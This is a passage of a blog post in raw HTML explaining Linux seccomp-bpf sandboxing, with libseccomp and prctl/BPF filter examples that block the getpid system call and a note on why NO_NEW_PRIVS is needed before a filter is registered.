url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAACDUlEQVQ4y31T55raQBADQi82rhQbgwu4Y+Dy/q+mjIZLvlwu8GO+Wa+9Wo0k96LKgZ9NsXJnMJwAphdg7R+kQhhugJWzhet5MEwDg8EAvV7vfZV1gTAKYDuWlAPP9+FIP56OyItc+gmHQwjLtrBaLbFcLjGZTF6DN22NPM9xik/IzqmAXGR9RBDu0V4bdLcr0izFZruBv/EV3HUdLJaL14BJmuhH4SFAEOwRHSPsdlv4vid7oQKRNcdeLBbvRyaLowCkAhonJ2V4uZy1Z8IsTmI0TY2yKpTpfDGHbdsij43RaPQd8HbvdMQoOughHr4/biDzsizw8fOh4NSzu3WIRRrqu9vvYBgG5vM5hsMfXwHTLNFDBKybCoUAEbAQELLmYdVPLqUk67WJyXSi5vT7/T+lgGRz7VplRdCizJUZzXiOmWjnPr+rqlLfb0XjPBd5tM7COsJ0OkWv6646MsUPw0A7R6J27HthlMiaRtFpPnNsmsYIWdZaDLOF7fjJkAacL5nexthUdaWRMWUsy7K+j/RZr3MoJlC3x8cdZEs2v/U0JSb/Hvgb+L+XtW3zdFc62TE+WxmNrjuSzfF4rOPMZjPNIHUaDofvc0g3n6C1/h0U/xn4WOWg6NSUa7rOy6LP7FJzTsWMci2ArUaBrgViii3/rIotnQFm1qin67lqgGma+ldRX5Yn+3yn38j+L/oeYNGWNgJgAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/0ee175e14f41725ecf75677f3f330566/8ac56/image-20240618230141319.webp 240w,\n/static/0ee175e14f41725ecf75677f3f330566/d3be9/image-20240618230141319.webp 480w,\n/static/0ee175e14f41725ecf75677f3f330566/e46b2/image-20240618230141319.webp 960w,\n/static/0ee175e14f41725ecf75677f3f330566/efe91/image-20240618230141319.webp 1210w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/0ee175e14f41725ecf75677f3f330566/8ff5a/image-20240618230141319.png 240w,\n/static/0ee175e14f41725ecf75677f3f330566/e85cb/image-20240618230141319.png 480w,\n/static/0ee175e14f41725ecf75677f3f330566/d9199/image-20240618230141319.png 960w,\n/static/0ee175e14f41725ecf75677f3f330566/a3767/image-20240618230141319.png 1210w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/0ee175e14f41725ecf75677f3f330566/d9199/image-20240618230141319.png\"\n            alt=\"image-20240618230141319\"\n            title=\"image-20240618230141319\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"implementing-seccomp-bpf-with-libseccomp\" style=\"position:relative;\"><a href=\"#implementing-seccomp-bpf-with-libseccomp\" aria-label=\"implementing seccomp bpf with libseccomp permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Implementing seccomp-bpf with libseccomp</h3>\n<p>Next, let’s implement seccomp-bpf using <code class=\"language-text\">seccomp_rule_add</code> from libseccomp.</p>\n<p>The code is taken directly from the following sample on <a href=\"https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/seccomp\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">HackTricks</a>.</p>\n<p><code class=\"language-text\">seccomp_rule_add</code> is a function from the libseccomp library that makes it easier to implement seccomp filters.</p>\n<p>Reference: <a href=\"https://github.com/seccomp/libseccomp\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">seccomp/libseccomp: The main libseccomp repository</a></p>\n<p>Reference: <a href=\"https://manpages.ubuntu.com/manpages/focal/en/man3/seccomp_rule_add.3.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Ubuntu Manpage: seccomp<em>rule</em>add, seccomp<em>rule</em>add_exact - Add a seccomp filter rule</a></p>\n<p>When using this library, you need to add <code class=\"language-text\">-lseccomp</code> at compile time, e.g. <code class=\"language-text\">gcc main.c -lseccomp</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;seccomp.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;unistd.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdio.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;errno.h></span></span>\n\n<span class=\"token comment\">//https://security.stackexchange.com/questions/168452/how-is-sandboxing-implemented/175373</span>\n<span class=\"token comment\">//gcc seccomp_bpf.c -o seccomp_bpf -lseccomp</span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">void</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token comment\">/* initialize the libseccomp context */</span>\n  scmp_filter_ctx ctx <span class=\"token operator\">=</span> <span class=\"token function\">seccomp_init</span><span class=\"token punctuation\">(</span>SCMP_ACT_KILL<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  \n  <span class=\"token comment\">/* allow exiting */</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Adding rule : Allow exit_group\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">seccomp_rule_add</span><span class=\"token punctuation\">(</span>ctx<span class=\"token punctuation\">,</span> SCMP_ACT_ALLOW<span class=\"token punctuation\">,</span> <span class=\"token function\">SCMP_SYS</span><span class=\"token punctuation\">(</span>exit_group<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  \n  <span class=\"token comment\">/* allow getting the current pid */</span>\n  <span class=\"token comment\">//printf(\"Adding rule : Allow getpid\\n\");</span>\n  <span class=\"token comment\">//seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(getpid), 0);</span>\n  \n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Adding rule : Deny getpid\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">seccomp_rule_add</span><span class=\"token punctuation\">(</span>ctx<span class=\"token punctuation\">,</span> <span class=\"token function\">SCMP_ACT_ERRNO</span><span class=\"token punctuation\">(</span>EBADF<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token function\">SCMP_SYS</span><span class=\"token punctuation\">(</span>getpid<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token comment\">/* allow changing data segment size, as required by glibc */</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Adding rule : Allow brk\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">seccomp_rule_add</span><span class=\"token punctuation\">(</span>ctx<span class=\"token punctuation\">,</span> SCMP_ACT_ALLOW<span class=\"token punctuation\">,</span> <span class=\"token function\">SCMP_SYS</span><span class=\"token punctuation\">(</span>brk<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  \n  <span class=\"token comment\">/* allow writing up to 512 bytes to fd 1 */</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Adding rule : Allow write upto 512 bytes to FD 1\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">seccomp_rule_add</span><span class=\"token punctuation\">(</span>ctx<span class=\"token punctuation\">,</span> SCMP_ACT_ALLOW<span class=\"token punctuation\">,</span> <span class=\"token function\">SCMP_SYS</span><span class=\"token punctuation\">(</span>write<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token number\">2</span><span class=\"token punctuation\">,</span>\n    <span class=\"token function\">SCMP_A0</span><span class=\"token punctuation\">(</span>SCMP_CMP_EQ<span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token function\">SCMP_A2</span><span class=\"token punctuation\">(</span>SCMP_CMP_LE<span class=\"token punctuation\">,</span> <span class=\"token number\">512</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  \n  <span class=\"token comment\">/* if writing to any other fd, return -EBADF */</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Adding rule : Deny write to any FD except 1 \\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">seccomp_rule_add</span><span class=\"token punctuation\">(</span>ctx<span class=\"token punctuation\">,</span> <span class=\"token function\">SCMP_ACT_ERRNO</span><span class=\"token punctuation\">(</span>EBADF<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token function\">SCMP_SYS</span><span class=\"token punctuation\">(</span>write<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span>\n    <span class=\"token function\">SCMP_A0</span><span class=\"token punctuation\">(</span>SCMP_CMP_NE<span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  \n  <span class=\"token comment\">/* load and enforce the filters */</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Load rules and enforce \\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">seccomp_load</span><span class=\"token punctuation\">(</span>ctx<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">seccomp_release</span><span class=\"token punctuation\">(</span>ctx<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token comment\">//Get the getpid is denied, a weird number will be returned like</span>\n  <span class=\"token comment\">//this process is -9</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"this process is %d\\n\"</span><span class=\"token punctuation\">,</span> <span class=\"token function\">getpid</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>Reference: <a href=\"https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/seccomp\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Seccomp | HackTricks | HackTricks</a></p>\n<p>Compiling and running this code confirms that <code class=\"language-text\">getpid</code> fails due to seccomp-bpf. (Unlike Strict mode, when a system call is blocked by seccomp-bpf the process is not killed by SIGKILL.)</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 638px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/1beffd969817fba58a2bb216a52f3527/41be6/image-20240619200854256.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 25.416666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA20lEQVQY041Qy5KCMBAMFodlIYAQTHjlgSAIBt3i/7+tN+DVg4eurpqafsyQdigg78whAzcUrKLglcKl1mjMCHkdwUqJ6MwRpgw0Ew784ICekeQCYRgiTVPESQyybRvsY8VtGCFEibZpYdcF1i7o+w6/wQ9OJw+EkO9wnycMtx5StWAsBysYumsHrRW4cE1iijx/z3dkeXa0SZLks+Hr74mHazNNI+qmdmYG69NiXmaIUqCqKxcmXXsO5UKUdudHEXzf/2yojTpExuiDd2FxKRAEwddn7rue937LP0bveFKiLRihAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/1beffd969817fba58a2bb216a52f3527/8ac56/image-20240619200854256.webp 240w,\n/static/1beffd969817fba58a2bb216a52f3527/d3be9/image-20240619200854256.webp 480w,\n/static/1beffd969817fba58a2bb216a52f3527/a2d8a/image-20240619200854256.webp 638w\"\n              sizes=\"(max-width: 638px) 100vw, 638px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/1beffd969817fba58a2bb216a52f3527/8ff5a/image-20240619200854256.png 240w,\n/static/1beffd969817fba58a2bb216a52f3527/e85cb/image-20240619200854256.png 480w,\n/static/1beffd969817fba58a2bb216a52f3527/41be6/image-20240619200854256.png 638w\"\n            sizes=\"(max-width: 638px) 100vw, 638px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/1beffd969817fba58a2bb216a52f3527/41be6/image-20240619200854256.png\"\n            alt=\"image-20240619200854256\"\n            title=\"image-20240619200854256\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/7a9575f93f717e74e475d17c01671a5d/d6a46/image-20240619200923008.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 38.33333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABJElEQVQoz31R2W6DMBDkSBBgYhuwwSlpgUht//8LpzsbRU3VNg8jY3aZiyyEEcQ0TWjbFn3fYxwHTPOEfujl7pHSDO8dulOHUXZvOyPyPEeWZT8xy4ckmOcZrWkxyPP5nGCtRYwRy2VB13U4CVlKSc7Tb5JHxCnCi4sQAuqmhnMWTtxYOb33qOtaBemUDnknuekMjDEq1jSNnmVZIGPUQaLRjaHDYVBy55zieDyqY8amCMHYFOWcQqygqqqbQ3bFAZe8Dr0uU513irBbRuW7e7SiKBR5kYuz8jvyx+c71u0N277het2RxA1/BrtkHXRP0RgDgoBJrH3S47av2hGX2NG9H7omweX1gmV5URFNIrvs9l9Cutq2VWOy8Mfh4XB4/kf/wBfrV7ZCm9jKSgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/7a9575f93f717e74e475d17c01671a5d/8ac56/image-20240619200923008.webp 240w,\n/static/7a9575f93f717e74e475d17c01671a5d/d3be9/image-20240619200923008.webp 480w,\n/static/7a9575f93f717e74e475d17c01671a5d/e46b2/image-20240619200923008.webp 960w,\n/static/7a9575f93f717e74e475d17c01671a5d/6e1e4/image-20240619200923008.webp 1008w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/7a9575f93f717e74e475d17c01671a5d/8ff5a/image-20240619200923008.png 240w,\n/static/7a9575f93f717e74e475d17c01671a5d/e85cb/image-20240619200923008.png 480w,\n/static/7a9575f93f717e74e475d17c01671a5d/d9199/image-20240619200923008.png 960w,\n/static/7a9575f93f717e74e475d17c01671a5d/d6a46/image-20240619200923008.png 1008w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/7a9575f93f717e74e475d17c01671a5d/d9199/image-20240619200923008.png\"\n            alt=\"image-20240619200923008\"\n            title=\"image-20240619200923008\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"implementing-seccomp-bpf-with-prctl\" style=\"position:relative;\"><a href=\"#implementing-seccomp-bpf-with-prctl\" aria-label=\"implementing seccomp bpf with prctl permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Implementing seccomp-bpf with prctl</h3>\n<p>libseccomp is a library for implementing complex seccomp-bpf filters more easily. Without it, you can also implement seccomp-bpf directly using prctl.</p>\n<p>When configuring seccomp-bpf with prctl, use the following code:</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token function\">prctl</span><span class=\"token punctuation\">(</span>PR_SET_SECCOMP<span class=\"token punctuation\">,</span> SECCOMP_MODE_FILTER<span class=\"token punctuation\">,</span> prog<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>To configure seccomp-bpf, the second argument is <code class=\"language-text\">SECCOMP_MODE_FILTER</code> (not <code class=\"language-text\">SECCOMP_MODE_STRICT</code>).</p>\n<p>Unlike Strict mode, the third argument <code class=\"language-text\">prog</code> receives a pointer to a <code class=\"language-text\">struct sock_fprog</code> holding the filter program.</p>\n<p>Reference: <a href=\"https://www.kernel.org/doc/html/v4.19/userspace-api/seccomp_filter.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Seccomp BPF (Secure Computing with Filters) — The Linux Kernel documentation</a></p>\n<p>Here is code that adds a filter to block <code class=\"language-text\">getpid</code>, similar to the previous example:</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;errno.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stddef.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdio.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdlib.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;unistd.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;linux/audit.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;linux/filter.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;linux/seccomp.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;linux/unistd.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;sys/prctl.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;sys/types.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;sys/syscall.h></span></span>\n\n<span class=\"token keyword\">struct</span> <span class=\"token class-name\">sock_filter</span> filter<span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">BPF_STMT</span><span class=\"token punctuation\">(</span>BPF_LD <span class=\"token operator\">|</span> BPF_W <span class=\"token operator\">|</span> BPF_ABS<span class=\"token punctuation\">,</span> <span class=\"token function\">offsetof</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">struct</span> <span class=\"token class-name\">seccomp_data</span><span class=\"token punctuation\">,</span> arch<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token function\">BPF_JUMP</span><span class=\"token punctuation\">(</span>BPF_JMP <span class=\"token operator\">|</span> BPF_JEQ <span class=\"token operator\">|</span> BPF_K<span class=\"token punctuation\">,</span> AUDIT_ARCH_X86_64<span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token function\">BPF_STMT</span><span class=\"token punctuation\">(</span>BPF_RET <span class=\"token operator\">|</span> BPF_K<span class=\"token punctuation\">,</span> SECCOMP_RET_KILL<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token function\">BPF_STMT</span><span class=\"token punctuation\">(</span>BPF_LD <span class=\"token operator\">|</span> BPF_W <span class=\"token operator\">|</span> BPF_ABS<span class=\"token punctuation\">,</span> <span class=\"token function\">offsetof</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">struct</span> <span class=\"token class-name\">seccomp_data</span><span class=\"token punctuation\">,</span> nr<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token function\">BPF_JUMP</span><span class=\"token punctuation\">(</span>BPF_JMP <span class=\"token operator\">|</span> BPF_JEQ <span class=\"token operator\">|</span> BPF_K<span class=\"token punctuation\">,</span> __NR_getpid<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token function\">BPF_STMT</span><span class=\"token punctuation\">(</span>BPF_RET <span class=\"token operator\">|</span> BPF_K<span class=\"token punctuation\">,</span> SECCOMP_RET_ERRNO <span class=\"token operator\">|</span> EPERM<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token function\">BPF_STMT</span><span class=\"token punctuation\">(</span>BPF_RET <span class=\"token operator\">|</span> BPF_K<span class=\"token punctuation\">,</span> SECCOMP_RET_ALLOW<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">;</span>\n\n<span class=\"token keyword\">struct</span> <span class=\"token class-name\">sock_fprog</span> prog <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token punctuation\">.</span>len <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token keyword\">unsigned</span> <span class=\"token keyword\">short</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">sizeof</span><span class=\"token punctuation\">(</span>filter<span class=\"token punctuation\">)</span> <span class=\"token operator\">/</span> <span class=\"token keyword\">sizeof</span><span class=\"token punctuation\">(</span>filter<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token punctuation\">.</span>filter <span class=\"token operator\">=</span> filter<span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">;</span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">prctl</span><span class=\"token punctuation\">(</span>PR_SET_NO_NEW_PRIVS<span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n        <span class=\"token function\">perror</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"prctl(PR_SET_NO_NEW_PRIVS)\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span>EXIT_FAILURE<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">prctl</span><span class=\"token punctuation\">(</span>PR_SET_SECCOMP<span class=\"token punctuation\">,</span> SECCOMP_MODE_FILTER<span class=\"token punctuation\">,</span> <span class=\"token operator\">&amp;</span>prog<span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n        <span class=\"token function\">perror</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"prctl(PR_SET_SECCOMP)\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span>EXIT_FAILURE<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"this process is %d\\n\"</span><span class=\"token punctuation\">,</span> <span class=\"token function\">getpid</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>The first code executed in <code class=\"language-text\">main</code> enables the <code class=\"language-text\">NO_NEW_PRIVS</code> flag:</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">prctl</span><span class=\"token punctuation\">(</span>PR_SET_NO_NEW_PRIVS<span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">perror</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"prctl(PR_SET_NO_NEW_PRIVS)\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span>EXIT_FAILURE<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>This prevents the process from escalating privileges after the filter is applied, and is required before the actual filter registration with <code class=\"language-text\">prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &amp;prog)</code>.</p>\n<p>This code locks in the process’s privilege level so that the seccomp filter cannot be bypassed.</p>\n<p>Note: attempting to register the filter without this step results in the following error:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ ./a.out\nprctl<span class=\"token punctuation\">(</span>PR_SET_SECCOMP<span class=\"token punctuation\">)</span>: Permission denied</code></pre></div>\n<p>The following section registers the filter with <code class=\"language-text\">prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &amp;prog)</code>:</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code 